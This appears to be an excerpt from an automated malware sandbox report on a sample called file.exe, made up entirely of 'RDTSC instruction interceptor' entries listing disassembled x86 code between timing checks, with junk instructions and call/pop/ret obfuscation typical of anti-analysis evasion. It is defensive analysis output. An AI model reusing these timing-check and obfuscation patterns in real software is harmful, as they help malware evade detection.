                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A2F60 second address: 5A2FAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push esi 0x0000000a call 00007FBE44C971B8h 0x0000000f pop esi 0x00000010 mov dword ptr [esp+04h], esi 0x00000014 add dword ptr [esp+04h], 0000001Ch 0x0000001c inc esi 0x0000001d push esi 0x0000001e ret 0x0000001f pop esi 0x00000020 ret 0x00000021 sub cl, FFFFFFD8h 0x00000024 push 00000000h 0x00000026 mov ecx, 419AA9CAh 0x0000002b and ecx, dword ptr [ebp+122D2DCCh] 0x00000031 push 5EF72820h 0x00000036 push eax 0x00000037 push edx 0x00000038 je 00007FBE44C971B8h 0x0000003e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A2FAA second address: 5A3035 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FBE4468965Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xor dword ptr [esp], 5EF728A0h 0x00000011 mov dword ptr [ebp+124525C6h], ebx 0x00000017 push 00000003h 0x00000019 add dword ptr [ebp+122D5C20h], edx 0x0000001f jmp 00007FBE4468965Ah 0x00000024 push 00000000h 0x00000026 push 00000000h 0x00000028 push ebp 0x00000029 call 00007FBE44689658h 0x0000002e pop ebp 0x0000002f mov dword ptr [esp+04h], ebp 0x00000033 add dword ptr [esp+04h], 00000014h 0x0000003b inc ebp 0x0000003c push ebp 0x0000003d ret 0x0000003e pop ebp 0x0000003f ret 0x00000040 push 00000003h 0x00000042 movzx edi, cx 0x00000045 push C51C2B11h 0x0000004a push esi 0x0000004b push esi 0x0000004c push ecx 0x0000004d pop ecx 0x0000004e pop esi 0x0000004f pop esi 0x00000050 xor dword ptr [esp], 051C2B11h 0x00000057 mov esi, dword ptr [ebp+122D2F0Ch] 0x0000005d lea ebx, dword ptr [ebp+12454E40h] 0x00000063 cld 0x00000064 xchg eax, ebx 0x00000065 pushad 0x00000066 pushad 0x00000067 jmp 00007FBE44689660h 0x0000006c push ecx 0x0000006d pop ecx 0x0000006e popad 0x0000006f push eax 0x00000070 push edx 0x00000071 push edi 0x00000072 pop edi 0x00000073 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A3035 second address: 5A3058 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FBE44C971C8h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A3147 second address: 5A316C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBE44689667h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d pushad 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A316C second address: 5A31B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 js 00007FBE44C971B8h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e mov eax, dword ptr [eax] 0x00000010 pushad 0x00000011 jmp 00007FBE44C971BEh 0x00000016 jnc 00007FBE44C971BCh 0x0000001c popad 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007FBE44C971C8h 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A31B7 second address: 5A3236 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FBE44689656h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007FBE44689668h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 popad 0x00000014 pop eax 0x00000015 mov cx, si 0x00000018 push 00000003h 0x0000001a mov dword ptr [ebp+122D27B9h], eax 0x00000020 sub ecx, dword ptr [ebp+122D2D3Ch] 0x00000026 push 00000000h 0x00000028 push 00000000h 0x0000002a push edi 0x0000002b call 00007FBE44689658h 0x00000030 pop edi 0x00000031 mov dword ptr [esp+04h], edi 0x00000035 add dword ptr [esp+04h], 00000014h 0x0000003d inc edi 0x0000003e push edi 0x0000003f ret 0x00000040 pop edi 0x00000041 ret 0x00000042 pushad 0x00000043 mov eax, dword ptr [ebp+122D2E10h] 0x00000049 popad 0x0000004a add dword ptr [ebp+122D17F8h], edi 0x00000050 push 00000003h 0x00000052 mov dword ptr [ebp+122D32B3h], esi 0x00000058 push 59E362B0h 0x0000005d push eax 0x0000005e push edx 0x0000005f jmp 00007FBE4468965Bh 0x00000064 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A3236 second address: 5A329F instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FBE44C971B8h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c add dword ptr [esp], 661C9D50h 0x00000013 push 00000000h 0x00000015 push ebx 0x00000016 call 00007FBE44C971B8h 0x0000001b pop ebx 0x0000001c mov dword ptr [esp+04h], ebx 0x00000020 add dword ptr [esp+04h], 0000001Dh 0x00000028 inc ebx 0x00000029 push ebx 0x0000002a ret 0x0000002b pop ebx 0x0000002c ret 0x0000002d add dword ptr [ebp+122D5C28h], eax 0x00000033 mov dx, 9F98h 0x00000037 lea ebx, dword ptr [ebp+12454E49h] 0x0000003d jmp 00007FBE44C971BFh 0x00000042 push edi 0x00000043 or dword ptr [ebp+122D2AA9h], esi 0x00000049 pop edi 0x0000004a xchg eax, ebx 0x0000004b push edx 0x0000004c push eax 0x0000004d push edx 0x0000004e jno 00007FBE44C971B6h 0x00000054 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A3379 second address: 5A33C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBE44689669h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 1FEDED2Fh 0x00000010 mov dword ptr [ebp+122D31F2h], edx 0x00000016 push 00000003h 0x00000018 mov dword ptr [ebp+122D28B2h], esi 0x0000001e push 00000000h 0x00000020 mov cx, bx 0x00000023 push 00000003h 0x00000025 mov ch, ah 0x00000027 push 4BCFA41Ch 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f jnp 00007FBE44689656h 0x00000035 pushad 0x00000036 popad 0x00000037 popad 0x00000038 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B5751 second address: 5B5755 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5917EA second address: 5917F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5917F0 second address: 591812 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jc 00007FBE44C971CDh 0x0000000b jmp 00007FBE44C971C7h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 591812 second address: 591849 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FBE44CEB6EBh 0x00000008 jmp 00007FBE44CEB6E5h 0x0000000d jmp 00007FBE44CEB6DBh 0x00000012 pop edx 0x00000013 pop eax 0x00000014 jp 00007FBE44CEB6EFh 0x0000001a push edi 0x0000001b push eax 0x0000001c pop eax 0x0000001d pop edi 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C2440 second address: 5C2448 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C2448 second address: 5C244D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C244D second address: 5C246D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 pop eax 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FBE44D6BDB4h 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C246D second address: 5C2471 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C25B6 second address: 5C25C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FBE44D6BDA6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C2713 second address: 5C2717 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C2717 second address: 5C276C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBE44D6BDB2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FBE44D6BDB4h 0x0000000e jg 00007FBE44D6BDACh 0x00000014 push edx 0x00000015 jmp 00007FBE44D6BDADh 0x0000001a pop edx 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FBE44D6BDADh 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C276C second address: 5C2774 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C2774 second address: 5C2778 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C2778 second address: 5C277C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C28DF second address: 5C28E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C2B86 second address: 5C2B94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jng 00007FBE44CEB6D6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C2B94 second address: 5C2BB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FBE44D6BDB1h 0x0000000a push eax 0x0000000b push edx 0x0000000c jbe 00007FBE44D6BDA6h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C2BB2 second address: 5C2BCD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBE44CEB6DBh 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f jno 00007FBE44CEB6D6h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C2BCD second address: 5C2BEA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 jmp 00007FBE44D6BDACh 0x0000000e jns 00007FBE44D6BDA6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C2EA3 second address: 5C2EA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C32DB second address: 5C32EB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C32EB second address: 5C32EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C32EF second address: 5C32F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C32F7 second address: 5C3301 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FBE44CEB6DEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B6D0D second address: 5B6D15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B6D15 second address: 5B6D19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B6D19 second address: 5B6D1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B6D1F second address: 5B6D47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jno 00007FBE44CEB6D6h 0x0000000d jmp 00007FBE44CEB6E3h 0x00000012 popad 0x00000013 pushad 0x00000014 push edi 0x00000015 pop edi 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C3FAD second address: 5C3FB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jg 00007FBE44D6BDA6h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C92A0 second address: 5C92B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 push esi 0x00000008 jne 00007FBE44CEB6D6h 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 push edi 0x00000012 pop edi 0x00000013 jno 00007FBE44CEB6D6h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C92B9 second address: 5C92BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 598412 second address: 598416 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CB64B second address: 5CB660 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBE44D6BDAAh 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CB660 second address: 5CB664 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CB664 second address: 5CB679 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBE44D6BDADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CB679 second address: 5CB699 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007FBE44CEB6DBh 0x00000013 je 00007FBE44CEB6D6h 0x00000019 popad 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CB8D9 second address: 5CB8E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FBE44D6BDA6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D1251 second address: 5D129D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007FBE44CEB6E0h 0x0000000a je 00007FBE44CEB6E6h 0x00000010 jmp 00007FBE44CEB6E0h 0x00000015 pushad 0x00000016 push esi 0x00000017 pop esi 0x00000018 jmp 00007FBE44CEB6E1h 0x0000001d jmp 00007FBE44CEB6DBh 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D0B21 second address: 5D0B25 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D0DD2 second address: 5D0DD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D0F97 second address: 5D0F9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D0F9B second address: 5D0FAD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FBE44CEB6DAh 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D0FAD second address: 5D0FB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D3379 second address: 5D337F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D337F second address: 5D3384 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D3473 second address: 5D3488 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBE44CEB6E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D3589 second address: 5D3592 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D366D second address: 5D3673 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D376C second address: 5D3772 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D3772 second address: 5D3776 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D3CB4 second address: 5D3CBE instructions: 0x00000000 rdtsc 0x00000002 jl 00007FBE44D6BDACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D3E63 second address: 5D3E69 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D3E69 second address: 5D3E90 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007FBE44D6BDB6h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jl 00007FBE44D6BDA8h 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D41C6 second address: 5D41CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D429B second address: 5D42F0 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FBE44D6BDB3h 0x00000008 jmp 00007FBE44D6BDADh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [esp], eax 0x00000012 push 00000000h 0x00000014 push edi 0x00000015 call 00007FBE44D6BDA8h 0x0000001a pop edi 0x0000001b mov dword ptr [esp+04h], edi 0x0000001f add dword ptr [esp+04h], 00000018h 0x00000027 inc edi 0x00000028 push edi 0x00000029 ret 0x0000002a pop edi 0x0000002b ret 0x0000002c mov edi, ebx 0x0000002e xchg eax, ebx 0x0000002f jmp 00007FBE44D6BDB2h 0x00000034 push eax 0x00000035 pushad 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 popad 0x0000003a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D42F0 second address: 5D42F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D42F4 second address: 5D42FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D42FD second address: 5D4303 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D52AE second address: 5D5339 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007FBE44D6BDA6h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], eax 0x00000011 push 00000000h 0x00000013 push ebx 0x00000014 call 00007FBE44D6BDA8h 0x00000019 pop ebx 0x0000001a mov dword ptr [esp+04h], ebx 0x0000001e add dword ptr [esp+04h], 00000015h 0x00000026 inc ebx 0x00000027 push ebx 0x00000028 ret 0x00000029 pop ebx 0x0000002a ret 0x0000002b jmp 00007FBE44D6BDB0h 0x00000030 push 00000000h 0x00000032 sub esi, 5A4F6701h 0x00000038 push 00000000h 0x0000003a push 00000000h 0x0000003c push edx 0x0000003d call 00007FBE44D6BDA8h 0x00000042 pop edx 0x00000043 mov dword ptr [esp+04h], edx 0x00000047 add dword ptr [esp+04h], 0000001Bh 0x0000004f inc edx 0x00000050 push edx 0x00000051 ret 0x00000052 pop edx 0x00000053 ret 0x00000054 xchg eax, ebx 0x00000055 pushad 0x00000056 pushad 0x00000057 push ebx 0x00000058 pop ebx 0x00000059 jmp 00007FBE44D6BDB6h 0x0000005e popad 0x0000005f push eax 0x00000060 push edx 0x00000061 pushad 0x00000062 popad 0x00000063 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D62B1 second address: 5D62B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D5AFE second address: 5D5B08 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FBE44D6BDACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D62B6 second address: 5D62BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D62BB second address: 5D633A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push ecx 0x0000000f call 00007FBE44D6BDA8h 0x00000014 pop ecx 0x00000015 mov dword ptr [esp+04h], ecx 0x00000019 add dword ptr [esp+04h], 00000016h 0x00000021 inc ecx 0x00000022 push ecx 0x00000023 ret 0x00000024 pop ecx 0x00000025 ret 0x00000026 or dword ptr [ebp+122D27C2h], ecx 0x0000002c push 00000000h 0x0000002e pushad 0x0000002f jmp 00007FBE44D6BDAAh 0x00000034 jng 00007FBE44D6BDA8h 0x0000003a push ecx 0x0000003b pop eax 0x0000003c popad 0x0000003d push 00000000h 0x0000003f push 00000000h 0x00000041 push edi 0x00000042 call 00007FBE44D6BDA8h 0x00000047 pop edi 0x00000048 mov dword ptr [esp+04h], edi 0x0000004c add dword ptr [esp+04h], 0000001Ah 0x00000054 inc edi 0x00000055 push edi 0x00000056 ret 0x00000057 pop edi 0x00000058 ret 0x00000059 xchg eax, ebx 0x0000005a pushad 0x0000005b push eax 0x0000005c push edx 0x0000005d jmp 00007FBE44D6BDB1h 0x00000062 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D75CE second address: 5D75D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D75D3 second address: 5D7603 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBE44D6BDB3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FBE44D6BDB6h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D8395 second address: 5D8431 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FBE44CEB6D8h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push edi 0x00000010 call 00007FBE44CEB6D8h 0x00000015 pop edi 0x00000016 mov dword ptr [esp+04h], edi 0x0000001a add dword ptr [esp+04h], 00000018h 0x00000022 inc edi 0x00000023 push edi 0x00000024 ret 0x00000025 pop edi 0x00000026 ret 0x00000027 push esi 0x00000028 call 00007FBE44CEB6E5h 0x0000002d jmp 00007FBE44CEB6DDh 0x00000032 pop esi 0x00000033 pop edi 0x00000034 mov dword ptr [ebp+122D2B66h], eax 0x0000003a push 00000000h 0x0000003c push 00000000h 0x0000003e push 00000000h 0x00000040 push esi 0x00000041 call 00007FBE44CEB6D8h 0x00000046 pop esi 0x00000047 mov dword ptr [esp+04h], esi 0x0000004b add dword ptr [esp+04h], 0000001Bh 0x00000053 inc esi 0x00000054 push esi 0x00000055 ret 0x00000056 pop esi 0x00000057 ret 0x00000058 push eax 0x00000059 pushad 0x0000005a push eax 0x0000005b push edx 0x0000005c jmp 00007FBE44CEB6E9h 0x00000061 rdtsc
